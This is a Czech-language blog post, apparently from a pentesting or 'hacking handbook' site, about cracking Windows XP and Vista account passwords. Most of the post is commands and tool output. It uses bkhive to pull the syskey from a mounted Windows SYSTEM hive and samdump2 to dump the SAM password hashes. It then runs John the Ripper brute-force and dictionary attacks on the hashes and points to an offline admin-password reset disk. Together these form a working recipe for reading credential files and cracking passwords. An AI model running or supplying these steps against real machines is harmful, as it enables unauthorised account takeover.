Crack Windows Syskey SAM – Samdump2 a John the Ripper / Djohn

Hacking handbook John the Ripper Ve fóru jsem slíbil rozepsat téma – prolomení hesla v příkazové řádce. Nejedná se o nic překotného. V dalším textu bude popsán crack Windows XP a Windows Vista HASHe a crack složitějších hesel pomocí jednoduchého clusteru. Tato krátka stať je pouze z důvodu kontinua. V širších souvislostech je téma aktuálnější než se zdá, zejména v době kdy se začíná seriózně hledat fungující řešení pro pentesting WPA zabezpečení. Padla první seriózní zmínka o nasazení implementace Pico Computingu v pentest Linux distribuci BackTrack. Refresh..

Notorický známé příkazy, postup pro získání a crack SAM a syskey z operačního systému Microsoft Windows pomocí slovníkového útoku nebo bruteforce útoku.. Aplikace bkhlive a samdump2 existují již dlouho.

bkhlive

bkhive /mnt/sda3/WINDOWS/system32/config/system uloz-syskey.txt

bkhive 1.1.1 by Objectif Securite

http://www.objectif-securite.ch

original author: ncuomo@studenti.unina.it

Root Key : $$$PROTO.HIV
Default ControlSet: 001
Bootkey: 88ca2e3c7352451edf7ffa9d73514348

nebo

cd /mnt/sda3/WINDOWS/system32/config/
cp SAM /tmp
cp system /tmp
bkhive system key > /tmp/key
samdump2 sam /tmp/key > /tmp/hash.txt

samdump2

samdump2 /mnt/sda3/WINDOWS/system32/config/SAM uloz-syskey.txt>hashe-hesel.txt

samdump2 1.1.1 by Objectif Securite

http://www.objectif-securite.ch

original author: ncuomo@studenti.unina.it

Root Key : SAM

Brute force útok na heslo

./john /root/hashe-hesel.txt -i:all

John the Ripper cracker

Slovníkový útok na heslo

./john -w slovník /root/hashe-hesel.txt -i:all

BootDisk Offline Recovery

Je Linux floppy nebo disk image distribuce pro změnu hesla administrátora nebo editaci registrů v operčním systému Microsoft Windows. ISO můžete stahovat z webu eunet. Live CD je podrobně popsáno zde.

offline password recovery